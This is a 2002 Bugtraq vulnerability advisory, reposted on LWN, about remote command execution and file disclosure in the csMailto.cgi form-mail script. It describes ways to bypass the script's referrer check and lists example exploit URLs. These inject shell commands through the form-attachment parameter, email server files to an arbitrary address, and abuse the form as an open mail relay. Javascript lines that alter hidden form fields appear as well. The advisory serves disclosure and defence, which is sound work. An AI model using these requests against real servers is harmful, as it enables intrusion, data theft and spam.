![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
From: Steve Gustin <stegus1@yahoo.com>
To: bugtraq@securityfocus.com
Subject: CGIscript.net - csMailto.cgi - Remote Command Execution
Date: Tue, 23 Apr 2002 13:02:17 -0700 (PDT)
CGIscript.net - csMailto.cgi - Remote Command
Execution
---------------------------------------------------------------------
Name : CGIscript.net - csMailto.cgi - Remote
Command Execution
Date : April 23, 2002
Product : csMailto
Vuln Type : Access Validation Error
Severity : HIGH RISK
Vendor : WWW.CGIscript.NET, LLC.
Homepage : http://www.cgiscript.net/
DISCUSSION:
---------------------------------------------------------------------
csMailto is a perl cgi formmail script developed by
Mike Barone and Andy Angrick of CGIscript.net. From
the website "(csMailto is) an automated script that
allows the user to build and manage multiple mailto
forms to use within your web site. Build your own
mailto forms without having to learn Perl. It also can
send and receive files!".
The script stores all its configuration data in hidden
form fields, relying on the user to accurately (and
honestly) echo that information back with each form
submission. The only thing allowing a user from
having complete control over the script is a referer
check which is easily bypassed.
Because of this and other problems, the script is
subject to the following attacks:
- execute commands on server
- execute command on server and mail output to anyone
- email server files to anyone
- downloading of logged form input (in CSV format)
- use of form to send email to anyone
EXPLOIT:
---------------------------------------------------------------------
Because the script stored all the form configuration
data in hidden fields in the actual form, once a user
can bypass the referrer check they can essentially do
anything an administrator of the program could do,
plus some additional things that probably weren't
intended.
The script doesn't even check for the full referrer,
it only checks for the presence of the server hostname
in the referral your send. For example, if the script
is http://host.com/cgi-script/CSMailto/CSMailto.cgi
then it will look for "host.com" in the referer.
This method is inherently insecure and can be bypassed
by:
- Creating a perl LWP script which could specify an
arbitrary referrer.
- Using javascript or other means to modify the form
values on the generated CSMailto form and allowing the
browser to send the original (and valid) URL as a
referrer.
- Creating a local form page with the target hostname
in the path and thus the referrer that is sent when in
the form is submitted (eg: C:\html\host.com\form.html)
- Creating a local html page with a simple link (see
below) and the target hostname in the path and thus in
the referrer that is sent when the link is clicked
(eg: C:\html\host.com.html)
Some example exploits are as follows. Note, these all
assume that the referrer check was bypassed with one
of the above methods.
- execute commands on server
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
- execute command on server and mail output to anyone
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform
- email server file to anyone
CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform
- download/access form input (no referer check)
CSMailto has the option to "have the feedback
exported to an external file". These files
are stored in CSV format and can be downloaded from:
CSMailto/export/FORM_NAME.csv
Form HTML files are often named after their form
names and the information is also stored in hidden
fields in the actual form like so
"...formname=FORM_NAME...". Also, it's worth noting
that the script doesn't properly escape '"', ',', or
nextline ("\n") chars, so any CSV data with those
characters may get corrupted.
- use form to send email to anyone
CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject&form-results=body&command=mailform
Another example of the seriousness of this problem, as
mentioned above, you can simply load an existing
CSMailto form and have your browser (IE in this
example) change some of the preset hidden form values
and then click submit. Example:
- email server file to anyone
javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
javascript:alert(document.forms[0]["Email"].value="user@host.com");
IMPACT:
---------------------------------------------------------------------
Because of the high number of users who are using
CGIscript.net scripts (over 17,000 csSearch users
alone according to the website) and the fact that
search engines can easily be used to identify sites
with the unique "csMailto.cgi" script name, the risk
posed by these flaws is very high indeed.
SOLUTION
---------------------------------------------------------------------
Vendor was notified on Apr 5, 2002 of the problem but
has not yet released a fix.
Affected parties may want to consider switching to a
free replacement such as
"nms formmail" which can be found at
http://nms-cgi.sourceforge.net/scripts.shtml
VENDOR HISTORY:
---------------------------------------------------------------------
April 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi,
csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/266432
March 25, 2002 - csSearch.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/264169
DISCLAIMER
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.
FEEDBACK:
---------------------------------------------------------------------
If anyone has any other CGIscript.net scripts they'd
like me to take a look at, just drop me a line at
stegus1@yahoo.com.
__________________________________________________
Do You Yahoo!?
Yahoo! Games - play chess, backgammon, pool and more
http://games.yahoo.com/